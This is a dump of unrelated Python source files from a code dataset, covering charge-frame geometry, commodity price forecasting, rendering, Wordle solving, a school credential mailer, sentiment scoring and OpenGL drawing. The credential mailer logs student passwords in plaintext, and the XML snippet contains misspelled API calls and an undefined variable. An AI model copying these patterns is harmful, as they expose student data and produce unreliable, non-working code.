azim=60)\n # Transpose to the right shape for plotting\n a_p = np.array(self.atom_positions).T\n a_p1 = np.array(self.atom_positions_plus).T\n c_p = np.array(self.c_positions).T\n c_p_l = np.array(self.c_positions_local).T\n c_p_g = np.array(self.c_positions_global).T\n # Plotting axes\n if plot_vectors:\n for frame_vec in self.frame_vectors:\n for il, local_vector_i in enumerate(frame_vec):\n atom_index = self.frame_atoms[0][il] - 1\n self.plot_axe(il, local_vector_i, atom_index)\n # Plotting points\n if plot_pos_1:\n ax.plot(a_p[0], a_p[1], a_p[2], c='gray', linestyle='None', marker=\"o\")\n ax.plot(c_p[0], c_p[1], c_p[2], marker=\"o\", c='orange', linestyle='None', alpha=0.8)\n if plot_labels:\n label = ['{:d}'.format(i) for i in range(self.n_charges)]\n for i, pos in enumerate(c_p.T):\n ax.text(pos[0], pos[1], pos[2], label[i])\n # ax.plot(c_p_l[0], c_p_l[1], c_p_l[2], marker=\"o\", c=\"g\", linestyle = 'None', alpha=0.8)\n # label = ['{:d}'.format(i) for i in range(n_charges)]\n # for i, pos in enumerate(c_p_l.T):\n # ax.text(pos[0], pos[1], pos[2], label[i])\n if plot_pos_2:\n ax.plot(a_p1[0], a_p1[1], a_p1[2], c='k', linestyle='None', marker=\"o\")\n ax.plot(c_p_g[0], c_p_g[1], c_p_g[2], marker=\"x\", c=\"r\", linestyle='None', alpha=0.8)\n if plot_labels:\n label = ['{:d}'.format(i) for i in range(self.n_charges)]\n for i, pos in enumerate(c_p_g.T):\n ax.text(pos[0], pos[1], pos[2], label[i])\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n ax.set_xlim(-1, 1)\n ax.set_ylim(-1, 1)\n ax.set_zlim(-1, 1)\n\n if plot_labels:\n plt.legend()\n\n plt.show()\n\n def plot_axe(self, il, local_vector, atom_index, c=\"k\"):\n atom_pos = self.atom_positions[atom_index]\n x = [atom_pos[0], atom_pos[0] + local_vector[0][0]]\n y = [atom_pos[1], atom_pos[1] + local_vector[0][1]]\n z = [atom_pos[2], atom_pos[2] + local_vector[0][2]]\n plt.plot(x, y, z, c='r', label=\"x\")\n x = [atom_pos[0], atom_pos[0] + local_vector[1][0]]\n y = [atom_pos[1], atom_pos[1] + local_vector[1][1]]\n z = [atom_pos[2], atom_pos[2] + local_vector[1][2]]\n plt.plot(x, y, z, '--g', label=\"y\")\n x = [atom_pos[0], atom_pos[0] + local_vector[2][0]]\n y = [atom_pos[1], atom_pos[1] + local_vector[2][1]]\n z = [atom_pos[2], atom_pos[2] + local_vector[2][2]]\n plt.plot(x, y, z, ':b', label=\"z\")\n print(\"check for orthogality: \", np.dot(local_vector[2], local_vector[0]))\n\n def match_charges(self):\n # Match each charge to a nucleus\n charge_atom_associations = []\n atom_charge_dict = {}\n for i_charge in range(self.n_charges):\n # initial distance, which can be compared to find smaller values\n min_distance = np.Inf\n atom_association = None\n for j_atom in range(self.n_atoms):\n d = distance.euclidean(self.c_positions[i_charge], self.atom_positions[j_atom])\n if d < min_distance:\n atom_association = j_atom\n min_distance = d\n charge_atom_associations.append([i_charge, atom_association])\n\n if atom_association not in list(atom_charge_dict.keys()):\n atom_charge_dict[atom_association] = [i_charge]\n else:\n atom_charge_dict[atom_association].append(i_charge)\n return charge_atom_associations, atom_charge_dict\n\n def global_to_local(self):\n # Find the position of the charges in the local axes\n # Create a new array for the 'local' charges\n c_pos_shape = np.array(self.c_positions).shape\n c_positions_local = np.zeros(c_pos_shape)\n\n used_atoms = []\n for f in range(self.n_frames):\n # Loop through the atoms in the frame\n for ai, atom_index in enumerate(self.frame_atoms[f]):\n atom_index -= 1\n if atom_index in list(self.atom_charge_dict.keys()) and atom_index not in used_atoms:\n charges = self.atom_charge_dict[atom_index]\n ex, ey, ez = self.frame_vectors[f][ai]\n # Find the associated charges for that atom, and loop\n for charge in charges:\n c_pos_global = self.c_positions[charge]\n atom_pos_xyz = self.atom_positions[atom_index]\n\n # Find the distance between the charge and the atom it belongs to\n r = np.array(c_pos_global) - np.array(atom_pos_xyz)\n\n local_x_pos = np.dot(ex, r)\n local_y_pos = np.dot(ey, r)\n local_z_pos = np.dot(ez, r)\n\n c_positions_local[charge][0] = local_x_pos\n c_positions_local[charge][1] = local_y_pos\n c_positions_local[charge][2] = local_z_pos\n\n used_atoms.append(atom_index)\n\n return c_positions_local\n\n def save_charges_local(self, output_filename):\n # output_filename_split = output_filename.split(\"/\")\n # output_filename = \"local_\" + output_filename_split[-1]\n # output_filename = os.path.join(*output_filename_split[:-1], output_filename)\n save_charges(self.c_positions_local,\n self.c_charges, filename=output_filename + \".local\")\n\n def set_charge_positions_plus(self, charge_positions):\n self.charge_positions_plus = charge_positions\n\n def set_local_charge_positions(self, charge_positions):\n self.c_positions_local = charge_positions\n\n def save_charges_global(self, output_filename):\n save_charges(self.charge_positions_plus,\n self.c_charges, filename=output_filename + \".global\")\n\n def get_distance_charges(self):\n return Kabsch.align_vectors(self.charge_positions_plus, self.c_positions)[1]\n\n def get_distance_atoms(self):\n return Kabsch.align_vectors(self.atom_positions, self.atom_positions_plus)[1]\n\n def local_to_global(self):\n # Find the position of the charges in the local axes\n # Create a new array for the 'local' charges\n c_pos_shape = np.array(self.c_positions).shape\n c_new_local = np.zeros(c_pos_shape)\n c_positions_global = np.zeros(c_pos_shape)\n\n used_atoms = []\n for f in range(self.n_frames):\n # Loop through the atoms in the frame\n for ai, atom_index in enumerate(self.frame_atoms[f]):\n atom_index -= 1\n if atom_index in list(self.atom_charge_dict.keys()) and atom_index not in used_atoms:\n charges = self.atom_charge_dict[atom_index]\n ex, ey, ez = self.frame_vectors_plus[f][ai]\n # Find the associated charges for that atom, and loop\n for charge in charges:\n c_pos_local = self.c_positions_local[charge]\n atom_pos_xyz = self.atom_positions_plus[atom_index]\n\n c_l_x = c_pos_local[0]\n c_l_y = c_pos_local[1]\n c_l_z = c_pos_local[2]\n\n print(atom_index, charge)\n print(c_l_x, c_l_y, c_l_z)\n print(ex)\n print(ey)\n print(ez)\n\n x_vec = np.multiply(ex, c_l_x)\n y_vec = np.multiply(ey, c_l_y)\n z_vec = np.multiply(ez, c_l_z)\n #\n sum_of_components = x_vec + y_vec + z_vec\n # translate back to the center of atoms (for the new conformation)\n c_positions_global[charge] = sum_of_components + atom_pos_xyz\n\n used_atoms.append(atom_index)\n return c_positions_global\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='ARS')\n parser.add_argument('-charges', help='.')\n parser.add_argument('-pcube', help='.')\n parser.add_argument('-pcube2', help='.', default=None)\n parser.add_argument('-frames', help='.')\n parser.add_argument('-output', help='.')\n parser.add_argument('-acd', help='.', default=None)\n\n args = parser.parse_args()\n print(' '.join(f'{k}={v}\\n' for k, v in vars(args).items()))\n\n ARS_obj = ARS(args.charges, args.pcube, args.frames, pcube_2=args.pcube2, method=\"bond\", atom_charge_match=args.acd)\n if args.pcube2 is not None:\n ARS_obj.save_charges_global(args.output)\n\n ARS_obj.save_charges_local(args.output)\n ARS_obj.save_charge_atom_associations(filename=args.output)\n\n if args.pcube2 is not None:\n print(f\"RMSD_ATOMS = {ARS_obj.get_distance_atoms()}\")\n print(f\"RMSD_CHARGES = {ARS_obj.get_distance_charges()}\")\n\n # dih = False\n # if len(sys.argv) > 6:\n # dih = [int(x) for x in sys.argv[6].split(\"_\")]\n\n # if dih:\n # dihedral = ARS_obj.get_dih_2(*dih)\n # print(f\"Dihedral {dih} = {dihedral}\")\n","repo_name":"EricBoittier/fdcm_project","sub_path":"ARS.py","file_name":"ARS.py","file_ext":"py","file_size_in_byte":19046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17085869727","text":"import requests\nimport lxml.html\nimport pandas as pd\nimport fbprophet\nimport matplotlib.pyplot as plt\n\nBASE_URL = 'https://www.indexmundi.com/commodities/'\n\n\ndef get_prices(commodities, months=360):\n params = {\n 'months': months,\n 'commodity': commodities\n }\n resp = requests.get(BASE_URL, params=params)\n html = lxml.html.fromstring(resp.content)\n if len(params['commodity']) == 2:\n correlation = html.cssselect('#lblPct')[0].text.split(': ')[-1]\n correlation = float(correlation)\n table = html.cssselect('#gvPrices')[0]\n headers = [e.text for e in table.cssselect('th')]\n\n # skip first row (header)\n rows = [[try_float(t.text) for t in e.cssselect('td')] for e in table.cssselect('tr')[1:]]\n return pd.DataFrame(columns=headers, data=rows)\n\n\ndef train_model(df, y_col, dt_col='Month', extra_cols=None):\n extra_cols = extra_cols or []\n df['ds'] = pd.to_datetime(df[dt_col])\n df['y'] = df[y_col]\n\n model = fbprophet.Prophet(weekly_seasonality=False, daily_seasonality=False, yearly_seasonality=False)\n for col in extra_cols:\n model.add_regressor(col)\n model.fit(df)\n return model\n\n\ndef try_float(v):\n \"\"\"try converting a string\n value to a float. will try to\n handle percentage strings too.\n if the value can't be converted to a float,\n just return the original value.\"\"\"\n v = v.strip()\n if v.endswith('%'):\n return float(v[:-1])/100\n try:\n return float(v)\n except ValueError:\n return v\n\n\nif __name__ == '__main__':\n commodities = [\n 'corn',\n 'beef',\n 'wheat',\n 'oranges',\n 'cheese'\n ]\n df = get_prices(['rock-phosphate'])\n model = train_model(df, 'Price')\n\n # df = get_prices(['rock-phosphate', 'beef'])\n # beef = 'Beef Price (US Dollars per Kilogram)'\n # phos = 'Rock Phosphate Price (US Dollars per Metric Ton)'\n # model = train_model(df, beef, extra_cols=[phos])\n\n # plt.plot(df['ds'], df['y'])\n # plt.show()\n\n future = model.make_future_dataframe(periods=365, freq='M')\n # import ipdb; ipdb.set_trace()\n forecast = model.predict(future)\n model.plot(forecast)\n plt.show()","repo_name":"frnsys/phospho","sub_path":"forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5362481270","text":"# -*- coding: utf-8 -*- \n\n\"\"\"\nMethods that has nos direct relation\nwith the ui\n\"\"\"\nimport os\nfrom PyQt4 import QtGui, QtCore\n\nfrom arnold import *\nclass CoreFunctions(QtCore.QThread):\n renderSignal = QtCore.pyqtSignal()\n def __init__(self):\n QtCore.QThread.__init__(self)\n self.r = self.g = self.b = 100\n self.log=None \n self.image_path = None\n\n def createSphere(self):\n # create a sphere geometric primitive\n self.sphere = AiNode(\"sphere\")\n AiNodeSetStr(self.sphere, \"name\", \"geo_sphere\")\n AiNodeSetVec(self.sphere, \"center\", 0.0, 0.0, 0.0)\n AiNodeSetFlt(self.sphere, \"radius\", 6.0)\n\n # create a red standard shader\n self.shader = AiNode(\"standard\")\n AiNodeSetStr(self.shader, \"name\", \"ai_shader\")\n AiNodeSetRGB(self.shader, \n \"Kd_color\", self.r, \n self.g, self.b)\n AiNodeSetFlt(self.shader, \"Ks\", 0.01)\n\n # assign the shaders to the geometric objects\n AiNodeSetPtr(self.sphere, \"shader\", self.shader)\n\n def createCamera(self):\n \"\"\"\n Create camera\n \"\"\"\n self.camera = AiNode(\"persp_camera\")\n AiNodeSetStr(self.camera, \"name\", \"cam\")\n # Camera position\n AiNodeSetVec(self.camera, \"position\", 0.0, 0.0, 40.0)\n AiNodeSetVec(self.camera, \"look_at\", 0.0, 0.0, 0.0)\n AiNodeSetFlt(self.camera, \"fov\", 45.0)\n\n def createLights(self):\n \"\"\"\n Create light\n \"\"\"\n \n self.light = AiNode(\"point_light\")\n AiNodeSetStr(self.light, \"name\", \"light_01\")\n\n #Light position\n AiNodeSetVec(self.light, \"position\", 0.0, 15.0, 45.0)\n AiNodeSetFlt(self.light, \"exposure\", 2.0)\n AiNodeSetFlt(self.light, \"intensity\", 8.0)\n\n def render_settings(self):\n \"\"\"\n Set render settings\n \"\"\"\n ops = AiUniverseGetOptions()\n AiNodeSetInt(ops, \"AA_samples\", 8)\n AiNodeSetInt(ops, \"xres\", 512)\n AiNodeSetInt(ops, \"yres\", 384)\n AiNodeSetInt(ops, \"GI_diffuse_depth\", 4)\n\n # create an output driver node\n driver = AiNode(\"driver_jpeg\")\n AiNodeSetStr(driver, \"name\", \"_driver\")\n AiNodeSetStr(driver, \"filename\", self.image_path)\n AiNodeSetFlt(driver, \"gamma\", 2.2)\n\n # create a gaussian filter node\n filter = AiNode(\"gaussian_filter\")\n AiNodeSetStr(filter, \"name\", \"_filter\")\n\n # assign the driver and filter to the main (beauty) AOV,\n # which is called \"RGBA\" and is of type RGBA\n outs_ = AiArrayAllocate(1, 1, AI_TYPE_STRING)\n AiArraySetStr(outs_, 0, \"RGBA RGBA _filter _driver\")\n AiNodeSetArray(ops, \"outputs\", outs_)\n\n def run(self):\n # Begin arnold process\n AiBegin()\n\n #Connecting log \n AiMsgSetLogFileName(self.log)\n AiMsgSetConsoleFlags(AI_LOG_ALL)\n\n self.createSphere()\n self.createCamera()\n self.createLights()\n self.render_settings()\n\n AiRender(AI_RENDER_MODE_CAMERA)\n\n # End arnold process\n AiEnd()\n self.renderSignal.emit()\n\n def setColor(self, r, g, b):\n self.r = r * 255\n self.g = g * 255\n self.b = b * 255\n\n","repo_name":"fidelm02/CS_TestsDec","sub_path":"app_PyQtArnold_RenderTest/Core/app_PyQtArnold_core.py","file_name":"app_PyQtArnold_core.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12085918382","text":"from wordle import Wordle, Correct_Code\nimport random\n\n\n# Naive solution\nclass Wordle_Solver:\n\n\tdef __init__(self, wordle, allowed_guesses):\n\t\tself.wordle = wordle\n\t\tself.allowed_guesses = allowed_guesses\n\t\tself.allowed_guesses_original = allowed_guesses\n\n\tdef reset(self):\n\t\tself.allowed_guesses = self.allowed_guesses_original\n\n\tdef solve(self, goal_word = None):\n\t\tif goal_word:\n\t\t\tself.wordle.set_goal_word(goal_word)\n\t\telse:\n\t\t\tself.wordle.choose_goal_word()\n\t\t\n\t\tresult = None\n\t\tprev_word = None\n\t\tCORRECT_RESULT = [ Correct_Code.GREEN for i in range(5) ]\n\t\ttries = 0\n\n\t\twhile not result == CORRECT_RESULT:\n\t\t\tword = self.make_guess(result, prev_word)\n\t\t\ttries += 1\n\n\t\t\tresult = self.wordle.get_guess_results(word)\n\t\t\tprev_word = word\n\n\t\tself.reset()\n\n\t\treturn tries\n\n\n\tdef filter_words(results, guess, word_list):\n\t\t\tgreens = {}\n\t\t\tyellows = {}\n\t\t\tgreys = {}\n\n\t\t\tfor idx, corr_code in enumerate(results):\n\t\t\t\tif corr_code == Correct_Code.GREEN:\n\t\t\t\t\tgreens[idx] = guess[idx]\n\t\t\t\telif corr_code == Correct_Code.YELLOW:\n\t\t\t\t\tyellows[idx] = guess[idx]\n\t\t\t\telif corr_code == Correct_Code.GREY:\n\t\t\t\t\tgreys[idx] = guess[idx]\n\n\t\t\tdef filter_guess(word):\n\t\t\t\tif word == guess:\n\t\t\t\t\treturn False\n\n\t\t\t\tfor idx, el in greens.items():\n\t\t\t\t\tif word[idx] != guess[idx]:\n\t\t\t\t\t\treturn False\n\n\t\t\t\tfor idx, el in yellows.items():\n\t\t\t\t\t# TODO this doesn't deal with two yellows for the same letter. As long as the letter appears once, the word will not be filtered.\n\t\t\t\t\tif not guess[idx] in word:\n\t\t\t\t\t\treturn False\n\n\t\t\t\tfor idx, el in greys.items():\n\t\t\t\t\tif word[idx] == guess[idx]:\n\t\t\t\t\t\treturn False \n\n\t\t\t\t\tif (not guess[idx] in yellows.values() and not guess[idx] in greens.values()) and guess[idx] in word:\n\t\t\t\t\t\treturn False\n\t\t\t\t\n\t\t\t\treturn True\n\n\t\t\treturn list(filter(filter_guess, word_list))\n\n\n\tdef make_guess(self, prev_result = None, prev_guess = None):\n\t\tif prev_result and prev_guess:\n\t\t\tself.allowed_guesses = Wordle_Solver.filter_words(prev_result, prev_guess, self.allowed_guesses)\n\n\t\treturn random.choice(self.allowed_guesses)\n\n\nclass Wordle_Solver_2:\n\n\tdef __init__(self, wordle, allowed_guesses):\n\t\tself.wordle = wordle\n\t\tself.allowed_guesses = allowed_guesses\n\t\tself.allowed_final_guesses = allowed_guesses\n\t\tself.allowed_guesses_original = allowed_guesses\n\t\t# do I do set up here?\n\t\t# What do I set up?\n\t\t# rank words by entropy\n\t\t#\t\t- given a word, how much does the list reduce by on average over any kind of result it gives\n\n\tdef train(self):\n\n\t\t# TODO: add more possible results\n\t\tpossible_results = [ \n\t\t\t[ Correct_Code.GREY for i in range(5) ], \n\t\t\t[ Correct_Code.GREEN for i in range(5) ], \n\t\t\t[ Correct_Code.YELLOW for i in range(5) ] \n\t\t] # TODO: every permutation of a result\n\n\t\tword_scores = []\n\n\t\t# TODO: see if it is possible to choose words from outside allowed_guesses that help reduce search space\n\t\t# Along the same vein see if the filtering for words is done as smartly as it can be.\n\t\tfor word in self.allowed_guesses:\n\n\t\t\ttotal_remaining = 0\n\n\t\t\tfor result in possible_results:\n\t\t\t\tfiltered_word_list = Wordle_Solver.filter_words(result, word, self.allowed_guesses)\n\t\t\t\ttotal_remaining += len(filtered_word_list)\n\t\t\t\n\t\t\tword_scores.append((word, total_remaining))\n\n\n\t\tword_scores.sort(key=(lambda el: el[1]))\n\n\t\tself.allowed_guesses = list(map(lambda el: el[0], word_scores))\n\n\tdef reset(self):\n\t\tself.allowed_guesses = self.allowed_guesses_original\n\n\n\t# NOTE: this is just a duplicate of the solve() func on Wordle_Solver, maybe think about how to remove this duplication\n\tdef solve(self, goal_word = None):\n\t\tif goal_word:\n\t\t\tself.wordle.set_goal_word(goal_word)\n\t\telse:\n\t\t\tself.wordle.choose_goal_word()\n\t\t\n\t\tresult = None\n\t\tprev_word = None\n\t\tCORRECT_RESULT = [ Correct_Code.GREEN for i in range(5) ]\n\t\ttries = 0\n\n\t\twhile not result == CORRECT_RESULT:\n\t\t\tword = self.make_guess(result, prev_word)\n\t\t\ttries += 1\n\n\t\t\tresult = self.wordle.get_guess_results(word)\n\t\t\tprev_word = word\n\n\t\tself.reset()\n\n\t\treturn tries\n\n\n\tdef make_guess(self, prev_result = None, prev_guess = None):\n\t\tif prev_result and prev_guess:\n\t\t\tself.allowed_guesses = Wordle_Solver.filter_words(prev_result, prev_guess, self.allowed_guesses)\n\n\t\tself.train()\n\n\t\treturn self.allowed_guesses[0]\n\t\t","repo_name":"adi-p/wordle-clone","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4651153815","text":"import pandas as pd\nimport requests, datetime, configparser, re\nfrom zeep import Client\nimport logging, logging.handlers, os, sys\n\n# V0.1: first version\n# V0.2: bugfix: stamboeknummer is unique per instelling\n\nversion = \"0.2\"\n\nstamnummer_cache = {}\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nlog = logging.getLogger(\"leerid\")\nLOG_FILENAME = os.path.join(sys.path[0], f'log/leerid.txt')\nlog_level = getattr(logging, 'INFO')\nlog.setLevel(log_level)\nlog_handler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=1024 * 1024, backupCount=20)\nlog_formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(name)s - %(message)s')\nlog_handler.setFormatter(log_formatter)\nlog.addHandler(log_handler)\n\nlog.info(\"START leerid\")\n\ndryrun = config[\"test\"][\"DRYRUN\"] == \"true\"\nss_send_to = config[\"test\"][\"SS_MESSAGE_RECEIVER_ID\"] if dryrun else \"\"\n\ndef get_leerlinggegevens_from_sdh():\n print(\"-> Lees gegevens van school-data-hub\")\n global stamnummer_cache\n response = requests.get(config[\"default\"][\"SDH_API_URL\"], headers={\"x-api-key\": config[\"default\"][\"SDH_API_KEY\"]})\n response_json = response.json()\n if response_json[\"status\"]:\n stamnummer_cache = {leerling[\"instellingsnummer\"]+leerling[\"stamboeknummer\"]: {\"instellingsnummer\": int(leerling[\"instellingsnummer\"]),\n \"leerlingnummer\": int(leerling[\"leerlingnummer\"]),\n \"klascode\": leerling[\"klascode\"]} for leerling in response_json[\"data\"]}\n print(\"--> SDH: gegevens zijn ok\")\n log.info(\"Reading from SDH is OK\")\n return True\n print(f\"--> SDH: foutmelding: {response_json['data']}\")\n log.error(f\"Reading from SDH is NOK, {response_json['data']}\")\n return False\n\n\ndef create_class_list():\n admingroep_cache = {}\n print(\"-> Maak een klassenlijst aan\")\n if not get_leerlinggegevens_from_sdh():\n return False\n try:\n leerid_naam = input(\"--> LeerID invoer bestand: \")\n instellingsnummer = input(\"--> Instellingsnummer: \")\n df = pd.read_excel(leerid_naam)\n for i, row in df.iterrows():\n stamnummer = row[\"Stamnummer\"]\n admingroep = row[\"Administratieve groep\"]\n key = instellingsnummer + str(stamnummer)\n if key in stamnummer_cache:\n klascode = stamnummer_cache[key][\"klascode\"]\n if admingroep not in admingroep_cache:\n admingroep_cache[admingroep] = set()\n admingroep_cache[admingroep].add(klascode)\n klaslijst = sorted([f\"{', '.join( sorted(list(v)))} ({k})\" for k, v in admingroep_cache.items()])\n with open(f\"klassenlijst-{instellingsnummer}-{ datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.txt\", \"w\") as klaslijst_file:\n klaslijst_file.write(\"# is commentaar, deze lijn wordt niet ingelezen.\\n\")\n klaslijst_file.write(\"# Om klassen te selecteren, verwijder de # aan het begin\\n\")\n klaslijst_file.write(\"# Na het verzenden wordt de lijn aangepast, bvb:\\n\")\n klaslijst_file.write(\"##1A (1e lj A) - 2023-04-01\\n\\n\")\n klaslijst_file.write(\"###### START LIJST ######\\n\\n\")\n for klas in klaslijst:\n klaslijst_file.write(f\"#{klas}\\n\")\n print(\"-> Klassenlijst is klaar\\n\")\n log.info(f\"Klassenlijst is ready, LeerID invoer {leerid_naam}, instellingsnummer {instellingsnummer}\")\n return True\n except Exception as e:\n print(e)\n log.error(f\"Could not create klassenlijst, {e}\")\n return False\n\n\ndef send_leerid_to_students():\n print(\"-> Start met verzenden\")\n if not get_leerlinggegevens_from_sdh():\n return False\n admingroup_lijst = []\n new_klaslijst = []\n now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')\n try:\n leerid_naam = input(\"--> Leerid invoer bestand: \")\n klaslijst_naam = input(\"--> Klassenlijst: \")\n instellingsnummer = input(\"--> Instellingsnummer: \")\n with open(klaslijst_naam, \"r\") as klaslijst_file:\n for line in klaslijst_file:\n line = line.strip(\"\\n\")\n found = re.search(\"\\(.*\\)\", line)\n if found and line.strip()[0] != \"#\":\n admingroup = found[0][1:-1]\n admingroup_lijst.append(admingroup)\n line = f\"##{line} - {now}\"\n new_klaslijst.append(line)\n soap = Client(config[\"default\"][\"SS_API_URL\"])\n api_key = config[\"default\"][\"SS_API_KEY\"]\n send_from = config[\"default\"][\"SS_MESSAGE_SENDER_ID\"]\n body_html = open(\"message-body.html\").read()\n subject_text = open(\"message-subject.txt\").read()\n df = pd.read_excel(leerid_naam)\n for i, row in df.iterrows():\n admingroep = row[\"Administratieve groep\"]\n if admingroep in admingroup_lijst:\n send_to = ss_send_to if dryrun else stamnummer_cache[instellingsnummer + str(row[\"Stamnummer\"])][\"leerlingnummer\"]\n body = body_html.replace(\"%%FIRSTNAME%%\", row[\"Voornaam\"])\n body = body.replace(\"%%USERNAME%%\", row[\"LeerID Gebruikersnaam\"])\n body = body.replace(\"%%PASSWORD%%\", row[\"LeerID Wachtwoord\"])\n print(f\"--> {row['Achternaam']} {row['Voornaam']} krijgt login {row['LeerID Gebruikersnaam']}, verzonden naar {send_to}\")\n ret = soap.service.sendMsg (api_key, send_to, subject_text, body, send_from, \"\", 0, False)\n print(\"Send returned:\", ret)\n log.info(f\"SensMsg, to {send_to}/{row['Achternaam']} {row['Voornaam']}, from {send_from}, username {row['LeerID Gebruikersnaam']}, password {row['LeerID Wachtwoord']}\")\n\n print(\"-> LeerID gegevens zijn verzonden\")\n log.info(\"SendMsg Done\")\n with open(klaslijst_naam, \"w\") as klaslijst_file:\n for l in new_klaslijst:\n klaslijst_file.write(f\"{l}\\n\")\n return True\n except Exception as e:\n print(e)\n log.error(f\"Could not send credentials, {e}\")\n return False\n\n\ndef show_info():\n print(f\"\"\"\n Versie: {version}\n Zorg dat je een excel hebt met de LeerID gegevens.\n Vanuit die excel kan je een klassenlijst genereren (zie menu).\n Pas die klassenlijst aan en selecteer de klassen waar je de LeerID gegevens naartoe wilt sturen.\n Zorg dat je een html-bestand hebt (messa-body.html) met de inhoud van het bericht dat je wilt sturen.\n Zorg dat je een tekst-bestand hebt (message-subject) met het onderwerp van het bericht dat je wilt sturen.\n Verzend de LeerID gegevens naar de geselecteerde klassen (zie menu).\n \"\"\")\n return True\n\nmenu_data = [\n [\"Info\", show_info],\n [\"Maak klassenlijst aan\", create_class_list],\n [\"Verzend LeerID gegevens naar de leerlingen\", send_leerid_to_students],\n [\"Stop\", None]\n]\n\nwhile True:\n for i, item in enumerate(menu_data):\n print(f\"{i + 1}> {item[0]}\")\n i += 1\n inp = input(f\"Maak uw keuze (1-{i}): \")\n choice = int(inp)\n if choice >= 1 and choice < i:\n if not menu_data[choice - 1][1]():\n break\n if choice == i:\n break","repo_name":"manuelborowski/leerid","sub_path":"leerid.py","file_name":"leerid.py","file_ext":"py","file_size_in_byte":7271,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36060887625","text":"\ndef combine(n, k):\n result = []\n num = [i for i in range(1, n+1)]\n stack = []\n def tracking(nums, length):\n if len(stack) == length:\n result.append(list(stack))\n return\n for index, i in enumerate(nums):\n stack.append(i)\n temp = list(nums[index + 1:])\n tracking(temp, length)\n stack.pop()\n tracking(num, k)\n return result\n\n\nif __name__ == \"__main__\":\n n = 3\n k = 2\n print(combine(n, k))\n\n","repo_name":"ficherfisher/leetcode","sub_path":"77Combinations.py","file_name":"77Combinations.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"37934313847","text":"import xml.etree.ElementTee as ET\n\ndata = ET.Element('chess')\n\nelement1 = ET.SubElenment(data, 'Opening')\n\ns_elem1 = ET.SubElenment(element1, 'E4')\ns_elem2 = ET.SubElenment(element2, 'D4')\n\ns_elem1.set('type','Accepted')\ns_elem2.set('type', 'Declined')\n\ns_elem1.text= \"King's Gambit Accepted\"\ns_elem2.text = \"Queen's Gambit Delined\"\n\nb_xml = ET.tostring(data)\n\nwith open(\"GFG.xml\",\"wb\") as f:\n f.write(b_xml)","repo_name":"Tue811/readfileHTMLandXML","sub_path":"xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72735281107","text":"import pandas as pd\r\nimport re\r\n\r\nsortie = open(\"sortieSentimentPolarite.txt\", \"w\")\r\nfile = \"train.xml\"\r\npolariteFile=\"polariteSentiment.txt\"\r\npolarite = open(polariteFile, \"r\")\r\nlines = polarite.readlines()\r\npolarite_dict = {line.rsplit('\"',maxsplit=4)[1].strip('\"'): (line.rsplit(';',maxsplit=4)[2], line.rsplit(';',maxsplit=4)[3], line.rsplit(';',maxsplit=4)[4].strip()) for line in lines}\r\ndata = pd.read_xml(file)\r\ncommentaires = data['commentaire'] # commentaires\r\n\r\n \r\nfor i, commentaire in enumerate(commentaires): # on parcours chaque commentaire\r\n print(\"coms\",i)\r\n if commentaire is None: # si le commentaire est vide\r\n sortie.write(\"\\n\") # alors on écrit rien dans le fichier de sortie\r\n elif commentaire is not None: # si le commentaire n'est pas vide\r\n commentaire_mots = commentaire.split()\r\n cpt = 0\r\n moy_positif = 0\r\n moy_negatif = 0\r\n moy_neutre = 0\r\n for mot in commentaire_mots: # on parcours chaque mot du commentaire\r\n if mot in polarite_dict:\r\n cpt += 1\r\n # print(\"test\",polarite_dict[mot])\r\n p = int(polarite_dict[mot][0]) \r\n ne = int(polarite_dict[mot][1]) \r\n n = int(polarite_dict[mot][2]) \r\n S = sum((p, ne, n))\r\n p = p / S \r\n ne = ne / S\r\n n = n / S\r\n moy_positif += p\r\n moy_negatif += n\r\n moy_neutre += ne\r\n if cpt == 0: # si on ne trouve aucun mot du commentaire dans les mots polarité\r\n sortie.write(\"\\n\")\r\n else: # sinon on ajoute la moyenne postif negatif et neutre de chaque mot\r\n moy_positif_final = moy_positif / cpt\r\n moy_neutre_final = moy_neutre / cpt\r\n moy_negative_final = moy_negatif / cpt\r\n sortie.write(\"2000001:{:.2f} 2000002:{:.2f} 2000003:{:.2f}\\n\".format(moy_positif_final, moy_neutre_final, moy_negative_final))\r\n\r\nsortie.close()\r\n","repo_name":"ElodieGiry/PredictionNoteDeFilm","sub_path":"testPolarite.py","file_name":"testPolarite.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4030560056","text":"from OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\n\nimport math\n\ndef init(): \n glClearColor(0.0,0.0,0.0,1.0) \n gluOrtho2D(0,100,0,100) \n\n\ndef nonPolarEllipse(xc, yc, xr, yr):\n\n glColor3f(255.0,0.0,0.0)\n glPointSize(5.0)\n glBegin(GL_POINTS)\n\n x = xc-xr\n t = xc+xr\n glVertex2f(x, yc)\n glVertex2f(t, yc)\n\n factor = 500\n increment = 1 / factor\n x += increment\n\n while x < t:\n offset = yr * math.sqrt(1 - (((x-xc)/xr) * ((x-xc)/xr)))\n glVertex2f(x, yc + offset)\n glVertex2f(x, yc - offset)\n x += increment\n\n glEnd()\n 